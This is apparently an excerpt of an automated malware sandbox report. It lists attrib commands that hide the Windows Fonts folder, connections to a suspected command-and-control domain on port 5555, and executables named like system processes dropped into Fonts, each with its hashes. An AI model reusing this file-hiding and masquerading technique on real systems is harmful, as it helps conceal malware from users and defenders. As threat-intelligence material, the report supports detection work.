attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | max.csrss.website | udp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 104.155.138.21:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 21.138.155.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 104.155.138.21:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
Files
memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp
C:\Windows\Fonts\svchost.exe
| MD5 | 0a7d7ed55c4202f5106824f11ecb22fa |
| SHA1 | 730da74e178d7b114e5d4c0f1dcc956accd4942d |
| SHA256 | 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595 |
| SHA512 | 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7 |
memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tem.vbs
| MD5 | f88a489a387ebc7c4c0c6b122ff6aa9b |
| SHA1 | 197f045b81fc47892ec4b879f4b55ef1fda8f307 |
| SHA256 | 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a |
| SHA512 | 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391 |
C:\Windows\Fonts\conhost.exe
| MD5 | 5d57bf45fb91812ead7ad8da8c3936a2 |
| SHA1 | 099c88af6ea4a49d2f80123c47fe85407ec42d69 |
| SHA256 | 553b1ab96e8204792f764fe25331aef9fa4c479b11b6154551d1b609e0158019 |
| SHA512 | 66b04caac0f5e1904bbd567a25734bf80dcf8982737e7bf6c68b10f07dd955445743ba76c0bad8cabf3650ec8202f73b864553ae10e39914a7c13395ee2a5cf3 |
C:\Windows\Fonts\KvMonXP.exe
| MD5 | 614a11a087f7e05063f6211c114a29ba |
| SHA1 | 903e200c338fd0a15e87214824c7f670cc7d282c |
| SHA256 | dda35a9441451839439a7da695209c6164ca0e7d0159b4bc012406a8a3f18ce4 |
| SHA512 | 947521a703af5c097199001f62cefc58b65d7cf723a4afe5a3b1f0b80e16ce7f357b1874f31b1cc5f55907fc18480e903313edcee02328b2527c00559d6d9f96 |
memory/1760-35-0x000001D714D30000-0x000001D714D40000-memory.dmp